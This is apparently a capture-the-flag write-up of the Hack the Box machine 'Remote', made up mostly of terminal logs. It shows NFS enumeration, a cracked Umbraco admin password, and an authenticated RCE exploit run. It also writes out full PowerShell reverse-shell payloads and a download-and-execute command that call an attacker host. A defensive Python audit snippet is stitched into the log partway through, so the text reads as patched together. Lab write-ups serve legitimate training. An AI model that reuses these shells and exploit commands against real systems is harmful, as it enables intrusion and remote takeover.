Hack the Box Remote

nmap -T4 -p- 10.10.10.180 -oA 10.10.10.180
Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-22 07:43 EDT
Nmap scan report for 10.10.10.180
Host is up (0.025s latency).
Not shown: 65519 closed ports
PORT STATE SERVICE
21/tcp open ftp
80/tcp open http
111/tcp open rpcbind
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
2049/tcp open nfs
5985/tcp open wsman
47001/tcp open winrm
49664/tcp open unknown
49665/tcp open unknown
49666/tcp open unknown
49667/tcp open unknown
49678/tcp open unknown
49679/tcp open unknown
49680/tcp open unknown
Nmap done: 1 IP address (1 host up) scanned in 452.22 seconds
root@cainta:~/Documents/htb/Remote# ftp 10.10.10.180
Connected to 10.10.10.180.
220 Microsoft FTP Service
Name (10.10.10.180:root): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> ls
200 PORT command successful.
125 Data connection already open; Transfer starting.
226 Transfer complete.
ftp> pwd
257 "/" is current directory.
=========================Starting nikto scan- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 10.10.10.180
+ Target Hostname: 10.10.10.180
+ Target Port: 80
+ Start Time: 2020-06-04 04:32:58 (GMT-4)
---------------------------------------------------------------------------
+ Server: No banner retrieved
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Server banner has changed from '' to 'Microsoft-IIS/10.0' which may suggest a WAF, load balancer or proxy is in place
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ OSVDB-3092: /home/: This might be interesting...
+ OSVDB-3092: /intranet/: This might be interesting...
+ /umbraco/ping.aspx: Umbraco ping page found
+ 7863 requests: 0 error(s) and 7 item(s) reported on remote host
+ End Time: 2020-06-04 04:38:18 (GMT-4) (320 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
Finished nikto scan=========================
root@cainta:~/Documents/htb/Remote# showmount -h
Usage: showmount [-adehv]
[--all] [--directories] [--exports]
[--no-headers] [--help] [--version] [host]
root@cainta:~/Documents/htb/Remote# showmount -e 10.10.10.180
Export list for 10.10.10.180:
/site_backups (everyone)
root@cainta:~/Documents/htb/Remote# mkdir /tmp/nfs
root@cainta:~/Documents/htb/Remote# mount -t nfs 10.10.10.180:/site_backups /tmp/nfs/ -nolock
root@cainta:~/Documents/htb/Remote#
root@cainta:/tmp/nfs# ls -latr
total 123
-rwx------ 1 nobody 4294967294 89 Nov 1 2018 Global.asax
-rwx------ 1 nobody 4294967294 152 Nov 1 2018 default.aspx
-rwx------ 1 nobody 4294967294 28539 Feb 20 00:57 Web.config
drwx------ 2 nobody 4294967294 64 Feb 20 12:16 App_Browsers
drwx------ 2 nobody 4294967294 4096 Feb 20 12:16 App_Plugins
drwx------ 2 nobody 4294967294 64 Feb 20 12:16 aspnet_client
drwx------ 2 nobody 4294967294 49152 Feb 20 12:16 bin
drwx------ 2 nobody 4294967294 64 Feb 20 12:16 css
drwx------ 2 nobody 4294967294 8192 Feb 20 12:16 Config
drwx------ 2 nobody 4294967294 4096 Feb 20 12:16 Media
drwx------ 2 nobody 4294967294 64 Feb 20 12:16 scripts
drwx------ 2 nobody 4294967294 8192 Feb 20 12:16 Umbraco
drwx------ 2 nobody 4294967294 4096 Feb 20 12:16 Umbraco_Client
drwx------ 2 nobody 4294967294 4096 Feb 20 12:16 Views
drwx------ 2 nobody 4294967294 4096 Feb 20 12:17 App_Data
drwx------ 2 nobody 4294967294 4096 Feb 23 13:35 .
drwxrwxrwt 20 root root 4096 Jun 4 06:19 ..
root@cainta:/tmp/nfs#
root@cainta:/tmp/nfs/App_Data# strings Umbraco.sdf | grep admin
Administratoradmindefaulten-US
Administratoradmindefaulten-USb22924d5-57de-468e-9df4-0961cf6aa30d
Administratoradminb8be16afba8c314ad33d812f22a04991b90e2aaa{"hashAlgorithm":"SHA1"}en-USf8512f97-cab1-4a4b-a49f-0a2054c47a1d
adminadmin@htb.localb8be16afba8c314ad33d812f22a04991b90e2aaa{"hashAlgorithm":"SHA1"}admin@htb.localen-USfeb1a998-d3bf-406a-b30b-e269d7abdf50
adminadmin@htb.localb8be16afba8c314ad33d812f22a04991b90e2aaa{"hashAlgorithm":"SHA1"}admin@htb.localen-US82756c26-4321-4d27-b429-1b5c7c4f882f
baconandcheese
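The two findings above (an NFS export readable by everyone, and an Umbraco user record hashed with legacy SHA1) are the kind of thing a defender can audit for directly. The following is an added example, not code from the original write-up or from Umbraco: it parses constructed samples modelled on the `showmount -e` and `strings Umbraco.sdf` output shown above, flags exports open to everyone, and reports user hashes whose algorithm marker is a legacy unsalted format. The set of algorithms treated as legacy is an assumption.

```python
import re
from typing import List, Tuple

# Constructed sample modelled on the page's `showmount -e 10.10.10.180` output
SHOWMOUNT_OUTPUT = """Export list for 10.10.10.180:
/site_backups (everyone)
/home/backup  10.0.0.0/24
"""

# Constructed sample modelled on the page's `strings Umbraco.sdf | grep admin` output
SDF_STRINGS = """Administratoradmindefaulten-US
Administratoradminb8be16afba8c314ad33d812f22a04991b90e2aaa{"hashAlgorithm":"SHA1"}en-USf8512f97-cab1-4a4b-a49f-0a2054c47a1d
adminadmin@htb.localb8be16afba8c314ad33d812f22a04991b90e2aaa{"hashAlgorithm":"SHA1"}admin@htb.localen-USfeb1a998-d3bf-406a-b30b-e269d7abdf50
"""

# Assumption: these markers denote unsalted legacy hashing and deserve a finding
LEGACY_ALGOS = {"SHA1", "MD5"}

# A 40-char hex digest immediately followed by Umbraco's JSON algorithm marker
HASH_RE = re.compile(r'([0-9a-f]{40})\{"hashAlgorithm":"([A-Za-z0-9]+)"\}')


def find_everyone_exports(showmount_output: str) -> List[str]:
    """Return export paths that showmount lists as available to everyone or '*'."""
    exports = []
    for line in showmount_output.splitlines():
        parts = line.split()
        if len(parts) < 2 or not parts[0].startswith("/"):
            continue  # header line or blank line
        path, clients = parts[0], parts[1:]
        if any(c.strip("()") in ("everyone", "*") for c in clients):
            exports.append(path)
    return exports


def find_legacy_umbraco_hashes(strings_output: str) -> List[Tuple[str, str]]:
    """Return unique (digest, algorithm) pairs whose algorithm is a legacy format."""
    found = []
    for digest, algo in HASH_RE.findall(strings_output):
        if algo.upper() in LEGACY_ALGOS and (digest, algo) not in found:
            found.append((digest, algo))
    return found


if __name__ == "__main__":
    print("Exports open to everyone:", find_everyone_exports(SHOWMOUNT_OUTPUT))
    print("Legacy Umbraco hashes:", find_legacy_umbraco_hashes(SDF_STRINGS))
```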
root@cainta:~/Documents/htb/Remote/10.10.10.180/Umbraco-RCE# python exploit.py -u admin@htb.local -p baconandcheese -i 'http://10.10.10.180' -c ipconfig

Windows IP Configuration

Ethernet adapter Ethernet0 2:

Connection-specific DNS Suffix  . :
IPv6 Address. . . . . . . . . . . : dead:beef::453a:bc1d:f838:7960
Link-local IPv6 Address . . . . . : fe80::453a:bc1d:f838:7960%13
IPv4 Address. . . . . . . . . . . : 10.10.10.180
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : fe80::250:56ff:feb9:d57%13
                                    10.10.10.2
root@cainta:~/Documents/htb/Remote/10.10.10.180/Umbraco-RCE# python exploit.py -u admin@htb.local -p baconandcheese -i 'http://10.10.10.180' -c hostname
remote
root@cainta:~/Documents/htb/Remote/10.10.10.180/Umbraco-RCE# python exploit.py -u admin@htb.local -p baconandcheese -i 'http://10.10.10.180' -c whoami
iis apppool\defaultapppool
$client = New-Object System.Net.Sockets.TCPClient('10.10.14.37',4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()

$sm=(New-Object Net.Sockets.TCPClient('10.10.14.37',4444)).GetStream();[byte[]]$bt=0..65535|%{0};while(($i=$sm.Read($bt,0,$bt.Length)) -ne 0){;$d=(New-Object Text.ASCIIEncoding).GetString($bt,0,$i);$st=([text.encoding]::ASCII).GetBytes((iex $d 2>&1));$sm.Write($st,0,$st.Length)}
Save this as 'reverse.ps1'

python exploit.py -u admin@htb.local -p baconandcheese -i 'http://10.10.10.180' -c powershell.exe -a "IEX (New-Object Net.WebClient).DownloadString('http://10.10.14.37:80/reverse.ps1')"

Serve via SimpleHTTP server

root@cainta:~/Documents/htb/Remote/10.10.10.180# python -m SimpleHTTPServer 80
Serving HTTP on 0.0.0.0 port 80 ...
10.10.10.180 - - [04/Jun/2020 08:36:02] "GET /reverse.ps1 HTTP/1.1" 200 -


Reverse shell
root@cainta:~/Documents/htb/Remote# nc -nlvp 4444
listening on [any] 4444 ...
connect to [10.10.14.37] from (UNKNOWN) [10.10.10.180] 49710

PS C:\windows\system32\inetsrv> cd c:\
PS C:\> dir


Directory: C:\


Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 2/20/2020 1:13 AM ftp_transfer
d----- 2/19/2020 3:11 PM inetpub
d----- 2/19/2020 11:09 PM Microsoft
d----- 9/15/2018 3:19 AM PerfLogs
d-r--- 2/23/2020 2:19 PM Program Files
d----- 2/23/2020 2:19 PM Program Files (x86)
d----- 6/4/2020 5:47 AM site_backups
d-r--- 2/19/2020 3:12 PM Users
d----- 2/20/2020 12:52 AM Windows


PS C:\> cd Users
PS C:\Users> dir
PS C:\Users\Public> dir


Directory: C:\Users\Public


Mode LastWriteTime Length Name
---- ------------- ------ ----
d-r--- 2/19/2020 3:03 PM Documents
d-r--- 6/4/2020 9:27 AM Downloads
d-r--- 9/15/2018 3:19 AM Music
d-r--- 9/15/2018 3:19 AM Pictures
d-r--- 9/15/2018 3:19 AM Videos
-ar--- 6/4/2020 6:48 AM 34 user.txt
  • Initial foothold is a bit challenging, but we have to 'try harder', find other ways and avenues, and be creative.

Arcy Caparros